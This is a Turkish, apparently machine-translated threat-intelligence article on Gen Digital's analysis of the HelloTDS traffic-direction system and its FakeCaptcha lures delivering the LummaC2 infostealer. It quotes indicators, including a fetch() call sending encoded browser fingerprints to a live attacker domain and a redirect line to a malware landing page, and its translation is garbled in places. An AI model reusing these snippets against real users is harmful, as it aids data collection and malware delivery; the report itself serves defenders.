Son aylarda, yeni bir sofistike kötü amaçlı yazılım kampanyası dalgası, Hellotds ve onun imza ploy Fakecaptcha olarak bilinen zor bir altyapı tarafından yönlendirilen dünya çapında milyonlarca cihazdan geçti.
Kampanyanın kurnaz sosyal mühendislik ve teknik subterfuge karışımı, tehdit aktörlerinin çok çeşitli bölgelerde sistemleri tehlikeye atmalarını sağladı, şüphesiz kullanıcıları akış medyası tüketirken, paylaşılan dosyaları indirirken ve hatta meşru görünümlü web sitelerine göz attı.
Gen Digital (GEN) analistlerine göre, Hellotds’ın arkasındaki beyni küresel bir enfeksiyon ağını düzenledi ve tespitler Nisan ve Mayıs 2025 boyunca önemli ölçüde yükseldi.
.png
)
Cendigital araştırmacıları, HellotD’leri ilk olarak karmaşık bir trafik yön sistemi (TDS) olarak tanımladılar – hangi ziyaretçilerin LUMMAC2 gibi Infostealers’dan somurtkan tarayıcı güncellemelerine ve teknoloji destekleme dolandırıcılığına kadar değişen zararlı yükler almasını seçmek için cihaz ve ağ parmak izi kullanan kötü niyetli bir karar motoru.
Tehlike için giriş noktaları, tehlikeye atılmış veya saldırgan tarafından işletilen dosya paylaşım portallarını içerir (özellikle günlük[.]Net ve StreamTape[.]net), akış siteleri, pornografik platformlar ve hatta görünüşte zararsız reklam noktalarına gömülü kötüverizasyon.
Sistemin filtreleme ve yeniden yönlendirme mantığı, sanal makineler, VPN’ler veya bilinen analist ortamları gibi bariz bal kasetlerinden kaçınmasını sağlar, tespit ve yayından kaldırma çabalarını önemli ölçüde karmaşıklaştırır.
Kampanyanın ölçeği şaşırtıcı. Gen’in telemetrisi, sadece iki ay içinde 4,3 milyondan fazla giriş girişiminde bulunduğunu bildirdi ve ABD, Brezilya, Hindistan, Batı Avrupa ve orantılı olarak birkaç Balkan ve Afrika ülkesinde en yüksek etkiye sahipti.
Saldırganlar, hızlı etki alanı rotasyonunu, şifreli iletişimleri ve meşru hizmetleri taklit etmek için tasarlanmış sahte captchas’tan yararlanarak hem erişimlerini hem de otomatik güvenlik çözümlerinden kaçınma yeteneklerini en üst düzeye çıkarır.
Enfeksiyon zinciri tipik olarak bir kullanıcı enfekte bir siteyi ziyaret ettiğinde veya bubi sıkışmış bir indirme bağlantısını tıkladığında başlar. Kullanıcı tarafından bilinmeyen web sitesi, bir Hellotds uç noktasından uzaktan barındırılan bir JavaScript snippet’ini yükleyerek çok aşamalı bir parmak izi ve yönlendirme dizisini tetikler.
Cindigital analistler, kurbanların coğrafi konum, tarayıcı özellikleri ve davranışsal ipuçlarına göre gerçek zamanlı olarak değerlendirildiğini; Yalnızca “yüksek değer” olarak kabul edilirse, kullanıcı aktif kötü amaçlı yazılımlara yönelir.
.webp)
Enfeksiyon mekanizması: teknik derin bir dalış
Hellotds’un kalbinde, hem hassas hem de gizlilik için tasarlanmış titizlikle tasarlanmış, çok aşamalı bir enfeksiyon süreci bulunmaktadır.
.webp)
Potansiyel bir mağdur bir giriş noktası sitesine (tipik olarak bir dosyayı yükledikten veya indirdikten sonra) eriştiğinde, sayfa görünmez bir şekilde bir komut dosyası yerleştirir.
Bu komut dosyası sunucu tarafı bir ağ ve cihaz parmak izi rutini başlatır. Hellotds’ın arka uç, IP itibarı, coğrafi konum ve sanal ortamların göstergeleri gibi faktörleri kullanma, ister bir yük sunmak veya iyi huylu, inert bir komut dosyası (genellikle boş bir işlev veya gibi zararsız bir yorum olsun // ipx).
Ziyaretçi uygulanabilir bir hedef olarak işaretlenirse, sunucu “şifreli” yapılandırma yükleri dahil olmak üzere yoğun bir şekilde gizlenmiş bir JavaScript dosyasıyla yanıt verir.
Ayırt edici bir gösterge, Hellotds’ın özel bir HTTP başlığının kullanımıdır (megageocheckolololo) içinde Access-Control-Allow-HeadersTDS altyapısını avlayan mavi takımlar için seçici filtreleme ve bir ayırt edici özellik için kullanılır:-
Access-Control-Allow-Headers: content-type, megageocheckolololo, x-forwarded-for, x-requested-with, ...Tarayıcıda yürütülen komut dosyası, geniş parmak izi gerçekleştirir, cihaz donanım özellikleri, tarayıcı kodekleri, ekran yönü, aktif bellek, kullanıcı etkileşim modelleri ve daha fazlası gibi veriler toplar.
Toplanan veriler daha sonra kodlanır (Base64 ve Zlib-sıkıştırılmıştır) ve dinamik olarak üretilen bir URL’nin bir parçası olarak ikincil bir Hellotds uç noktasına iletilir:-
fetch("https://bu.unrimedironize.shop/cx/6Ae...n2Q?md=[mdglh]&pr=...&fc=...")Gömülü JSON konfigürasyonunun şifre çözme, izleme, hata raporlaması ve nihai yönlendirme (“ROT_URL”) için diğer URL’ler dahil olmak üzere çeşitli anahtarları ortaya çıkarır.
Sunucunun risk matrisi ziyaretçiyi yeşil aydınlatmaya devam ederse, tarayıcı zorla bir kötü amaçlı yazılım sunumuna veya aldatmaca sayfasına yönlendirilir, genellikle sahte bir captcha veya sahte yazılım güncellemesi olarak gizlenir.
Nihai yük için tipik bir Redirektör açılış sayfası şöyle görünüyor:-
location.href="hxxps://bestfree4u[.]com/?sub1=...&sub4={browser}&sub5={os}&sub6={country}";Bu agresif, uyarlanabilir yaklaşım enfeksiyon ile bitmez. Altyapı, ziyaretçinin özelliklerine bağlı olarak dinamik olarak iyi huylu veya kötü niyetli içerik sunar – vekillerin arkasındaki araştırmacılar ve kullanıcılar genellikle zararsız tuzaklar gösterilirken, sıradan kullanıcılar Lummac2 için yükleyiciler veya kurbanın Windows Run Diyaloguna yapıştırılması için komutlar gibi güçlü kötü amaçlı yazılımlar alırlar.
Gen’in ayrıntılı analizi, Fakecaptcha ve Hellotds’un ortaya koyduğu tehdidin altını çiziyor: hem teknolojik güvenlik açıklarından hem de insan faktörlerini kullanan kendini geliştiren, düşük sürtünmeli bir enfeksiyon altyapısı.
Hellotds’ın arkasındaki aktörler sürekli yenilik yaptıkça, bu adli detaylar ve gelecekteki saldırıları engellemek için benzersiz imzalardan yararlanmak için güvenlik ekipleri üzerindedir.
Siber güvenlik profesyonelleri için, Hellotds’ın yüksek hedefli, çok katmanlı enfeksiyon zincirini tanımak zorunludur.
Giriş vektörlerini, uyarlanabilir filtreleme ve yönlendirme mekanizmalarını anlayarak, savunucular ağ çevrelerini güçlendirebilir, daha etkili davranışsal analizler kullanabilir ve bu kötü amaçlı kampanyaları ek kullanıcıları tehlikeye atmadan önce bozabilir.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği